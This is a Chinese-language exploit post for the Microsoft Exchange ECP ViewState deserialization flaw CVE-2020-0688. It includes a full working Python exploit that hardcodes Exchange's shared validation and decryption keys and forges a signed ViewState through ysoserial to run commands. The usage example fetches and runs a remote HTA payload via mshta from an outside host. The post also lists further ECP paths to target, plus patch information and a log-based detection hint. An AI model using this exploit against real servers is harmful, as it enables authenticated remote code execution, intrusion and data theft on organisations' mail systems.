概述
在2020年2月的微软月度补丁中，Microsoft发布了一个重要补丁，修复Microsoft Exchange Server中的一个远程代码执行漏洞（即下文脚本所针对的CVE-2020-0688）。该漏洞由一位匿名研究人员报告，影响所有受支持版本的Exchange Server，已在2月的补丁中修复。
视频地址:https://youtu.be/7d_HoQ0LVy8 
最初，Microsoft称该漏洞是内存损坏问题，可通过向易受攻击的Exchange服务器发送特制邮件来利用。此后Microsoft修改了公告，目前的说法是：Exchange Server在安装时未能生成唯一的加密密钥，所有安装共用同一组ASP.NET validationKey/decryptionKey（即下文脚本中硬编码的两个密钥）。因此任何能登录OWA/ECP的账户都可以用这组密钥伪造带合法签名的__VIEWSTATE，让ECP反序列化攻击者构造的对象并执行命令。注意利用的前提是持有一个有效邮箱账户（脚本的-u/-p参数），并非无需认证。脚本是通过GET请求把__VIEWSTATE放在URL查询串里提交的，这类请求通常会完整出现在IIS访问日志中，可作为排查利用尝试的线索。
漏洞利用:
# encoding: UTF-8
import argparse
import os
import re
import readline
import subprocess
import sys
from urllib.parse import quote
from urllib.parse import urlparse

import requests
import urllib3

urllib3.disable_warnings()
# Directory holding ysoserial.exe, resolved relative to this script. The trailing
# "/" is deliberate: ysoserial() concatenates the command line straight onto it.
ysoserial_path = "{}/ysoserial-1.32/".format(os.path.abspath(os.path.dirname(__file__)))
# A single Session so the cookies issued by the OWA login carry over to the
# /ecp requests made later.
session = requests.Session()
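def _owa_login(login_url: str, destination: str, user: str, pwd: str) -> None:
    """POST the OWA forms-based login on the shared ``session``.

    A transport error (DNS, TLS, timeout) aborts the script. A rejected
    password is only reported: the detection below is a heuristic on the
    response text/URL, and the original author left the abort commented out,
    so the run continues and main() may still fail later.

    Args:
        login_url: ``<base_url>/owa/auth.owa``.
        destination: The URL the user gave on the command line, echoed back
            as the post-login ``destination`` form field.
        user: Login account (``domain\\user`` or UPN).
        pwd: Password; sent only in the form body, never printed.
    """
    form = {
        "password": pwd, "isUtf8": "1", "passwordText": "", "trusted": "4",
        "destination": destination, "flags": "4", "forcedownlevel": "0",
        "username": user,
    }
    headers = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0",
        "Connection": "close",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": "PrivateComputer=true; PBack=0",
    }
    print("[+] Login url: {}".format(login_url))
    try:
        # verify=False because Exchange is frequently deployed with self-signed
        # certificates. The flip side: the credentials travel over a TLS
        # channel whose peer is not checked, so only use this on a path you trust.
        login = session.post(login_url, data=form, headers=headers,
                             verify=False, timeout=30)
        print("[*] Status code: %i" % login.status_code)
    except Exception as e:
        print("[!] login error , error: {}".format(e))
        sys.exit(1)
    # Operator precedence kept from the original: A or (B and C).
    rejected = ("reason=" in login.text
                or ("reason=" in login.url and "owaLoading" in login.text))
    if rejected:
        print("[!] Login Incorrect, please try again with a different account..")
    else:
        print("[+] Login successfully! ")


def _viewstate_generator(base_url: str) -> str:
    """Scrape ``__VIEWSTATEGENERATOR`` from ``/ecp/default.aspx``.

    Falls back to ``B97B4E27`` (the generator listed for default.aspx in the
    path table below) when the page cannot be fetched or has no such field.
    """
    target_url = "{}/ecp/default.aspx".format(base_url)
    pattern = re.compile(r'id="__VIEWSTATEGENERATOR" value="(.+?)"')
    try:
        print("[*] Tring to get __VIEWSTATEGENERATOR...")
        page = session.get(target_url, verify=False, timeout=15)
        view = pattern.findall(page.text)[0]
        print("[+] Done! \n__VIEWSTATEGENERATOR:{}".format(view))
    except Exception as e:  # IndexError on no match, or a transport error
        view = "B97B4E27"
        print("[*] Can't get __VIEWSTATEGENERATOR, use default value: {} ({})".format(view, e))
    return view


def get_value(url: str, user: str, pwd: str) -> tuple[str, str | None, str]:
    """Log in to OWA and collect what the ViewState forgery needs.

    Args:
        url: Full OWA URL from ``-s``; its scheme and host form ``base_url``
            and the whole value is passed back as the login ``destination``.
        user: Login account.
        pwd: Password (sent in the login form, not logged).

    Returns:
        ``(view, key, base_url)``: the ``__VIEWSTATEGENERATOR`` value, the
        ``ASP.NET_SessionId`` cookie (``None`` when the server did not set
        one -- main() aborts in that case because it is used as the
        ``--viewstateuserkey``), and ``scheme://host``.

    Raises:
        SystemExit: if the login POST itself fails (see ``_owa_login``).
    """
    print("[*] Tring to login owa...")
    parts = urlparse(url)
    base_url = "{}://{}".format(parts.scheme, parts.netloc)
    _owa_login(base_url + '/owa/auth.owa', url, user, pwd)
    view = _viewstate_generator(base_url)
    try:
        print("[*] Tring to get ASP.NET_SessionId....")
        key = session.cookies['ASP.NET_SessionId']
        print("[+] Done!  ASP.NET_SessionId: {}".format(key))
    except Exception as e:
        # The session cookie is bound into the signed ViewState, so without it
        # the payload cannot validate; report and let the caller decide.
        key = None
        print("[!] Get ASP.NET_SessionId error, error: {} \n[*] Exit..".format(e))
    return view, key, base_url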
def ysoserial(cmd):    cmd = ysoserial_path+cmd    r = os.popen(cmd)    res = r.readlines()    return res[-1]
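# Static ASP.NET machine keys that every Exchange ECP install ships with; their
# being identical everywhere is the root cause described in the overview above.
_ECP_VALIDATION_KEY = "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"
_ECP_DECRYPTION_KEY = "E9D2490BD0075B51D1BA5288514514AF"


def _ysoserial_args(command: str, view: str, key: str, encrypt: bool) -> str:
    """Build the ysoserial.exe argument string for the ViewState gadget.

    ``command`` is dropped verbatim inside ``-c "..."``, so a command that
    itself contains double quotes will break the quoting.
    """
    base = ('ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{}" '
            '--validationalg="SHA1" --validationkey="{}" --generator="{}" '
            '--viewstateuserkey="{}" --islegacy ').format(
                command, _ECP_VALIDATION_KEY, view, key)
    if encrypt:
        return base + ' --decryptionalg="3DES" --decryptionkey="{}" --isencrypted'.format(
            _ECP_DECRYPTION_KEY)
    return base + " --isdebug"


def _exploit_url(base_url: str, view: str, payload: str, encrypt: bool) -> str:
    """Return the GET URL that makes /ecp/default.aspx deserialize ``payload``."""
    if encrypt:
        return "{}/ecp/default.aspx?__VIEWSTATEENCRYPTED=&__VIEWSTATE={}".format(
            base_url, quote(payload))
    return "{}/ecp/default.aspx?__VIEWSTATEGENERATOR={}&__VIEWSTATE={}".format(
        base_url, view, quote(payload))


def main() -> None:
    """CLI entry point: log in, forge a signed ViewState, fire it at ECP.

    Exits with status 1 when no ASP.NET_SessionId was obtained, since that
    value is the ``--viewstateuserkey`` the signature is bound to.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-s", "--server", required=True, help="ECP Server URL Example: http://ip/owa")
    # Raw string: "domain\user" is a syntax error in Python 3 ("\u" escape).
    parser.add_argument("-u", "--user", required=True, help=r"login account Example: domain\user")
    # NOTE: the password is taken from argv and is therefore visible in shell
    # history and the process list; the interface is kept for compatibility.
    parser.add_argument("-p", "--password", required=True, help="Password")
    parser.add_argument("-c", "--cmd", help="Command u want to execute", required=True)
    parser.add_argument("-e", "--encrypt", help="Encrypt the payload", action='store_true', default=False)
    args = parser.parse_args()
    print("[*] Start to exploit..")
    view, key, base_url = get_value(args.server, args.user, args.password)
    if key is None:
        sys.exit(1)
    re_payload = _ysoserial_args(args.cmd, view, key, args.encrypt)
    print("\n" + re_payload)
    out_payload = ysoserial(re_payload)
    final_exp = _exploit_url(base_url, view, out_payload, args.encrypt)
    print("\n[+] Exp url: {}".format(final_exp))
    print("\n[*] Auto trigger payload..")
    status = session.get(final_exp, verify=False, timeout=15)
    # A 500 is the usual sign the gadget ran (the page blows up after the
    # deserialization); anything else most likely means it was not accepted.
    if status.status_code == 500:
        print("[*] Status code: %i, Maybe success!" % status.status_code)
    else:
        print("[*] Status code: %i, payload probably not deserialized" % status.status_code)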
# Script entry point; main() parses the CLI, logs in, builds and fires the payload.
if __name__ == "__main__":
    main()
利用说明:
python3 CVE-2020-0688_EXP.py -h
usage: CVE-2020-0688_EXP.py [-h] -s SERVER -u USER -p PASSWORD -c CMD [-e]
optional arguments:
 -h, --help            show this help message and exit
 -s SERVER, --server SERVER      ECP Server URL Example: http://ip/owa
 -u USER, --user USER            login account Example: domain\user
 -p PASSWORD, --password PASSWORD  Password
 -c CMD, --cmd CMD               Command u want to execute
 -e, --encrypt                   Encrypt the payload
例： python CVE-2020-0688_EXP.py -s https://mail.x.com/ -u [email protected] -p passwd -c "mshta http://1.1.1.1/test.hta"
注意：-p 的密码在命令行中明文出现，会留在 shell 历史和进程列表里；-c 的内容会被原样放进 ysoserial 的 -c "…" 双引号内，命令本身不能包含双引号。
其他可用路径（每个页面的 __VIEWSTATEGENERATOR 不同，改用其他页面时脚本里传给 --generator 的值也要一并替换）:
/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27
/ecp/PersonalSettings/HomePage.aspx?showhelp=false&__VIEWSTATEGENERATOR=1D01FD4E
/ecp/PersonalSettings/HomePage.aspx?showhelp=false&__VIEWSTATEGENERATOR=1D01FD4E
/ecp/Organize/AutomaticReplies.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/RulesEditor/InboxRules.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/Organize/DeliveryReports.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/MyGroups/PersonalGroups.aspx?showhelp=false&__VIEWSTATEGENERATOR=A767F62B
/ecp/MyGroups/ViewDistributionGroup.aspx?pwmcid=1&id=38f4bec5-704f-4272-a654-95d53150e2ae&ReturnObjectType=1&__VIEWSTATEGENERATOR=321473B8
/ecp/Customize/Messaging.aspx?showhelp=false&__VIEWSTATEGENERATOR=9C5731F0
/ecp/Customize/General.aspx?showhelp=false&__VIEWSTATEGENERATOR=72B13321
/ecp/Customize/Calendar.aspx?showhelp=false&__VIEWSTATEGENERATOR=4AD51055
/ecp/Customize/SentItems.aspx?showhelp=false&__VIEWSTATEGENERATOR=4466B13F
/ecp/PersonalSettings/Password.aspx?showhelp=false&__VIEWSTATEGENERATOR=59543DCA
/ecp/SMS/TextMessaging.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/TroubleShooting/MobileDevices.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/Customize/Regional.aspx?showhelp=false&__VIEWSTATEGENERATOR=9097CD08
/ecp/MyGroups/SearchAllGroups.slab?pwmcid=3&ReturnObjectType=1&__VIEWSTATEGENERATOR=FD338EE0
/ecp/Security/BlockOrAllow.aspx?showhelp=false&__VIEWSTATEGENERATOR=362253EF
更新修复
您可以从下表访问各受支持 Microsoft Exchange Server 版本的安全更新说明并下载补丁。表中只列出受支持的版本/累积更新：不在表中的旧版本没有对应补丁，需要先升级到表中列出的 CU 或更新汇总再安装。
| 产品 | 文章 | 下载 |
|---|---|---|
| Microsoft Exchange Server 2010 Service Pack 3更新汇总30 | 4536989 | 安全更新 | 
| Microsoft Exchange Server 2013累积更新23 | 4536988 | 安全更新 | 
| Microsoft Exchange Server 2016累积更新14 | 4536987 | 安全更新 | 
| Microsoft Exchange Server 2016累积更新15 | 4536987 | 安全更新 | 
| Microsoft Exchange Server 2019累积更新3 | 4536987 | 安全更新 | 
| Microsoft Exchange Server 2019累积更新4 | 4536987 | 安全更新 |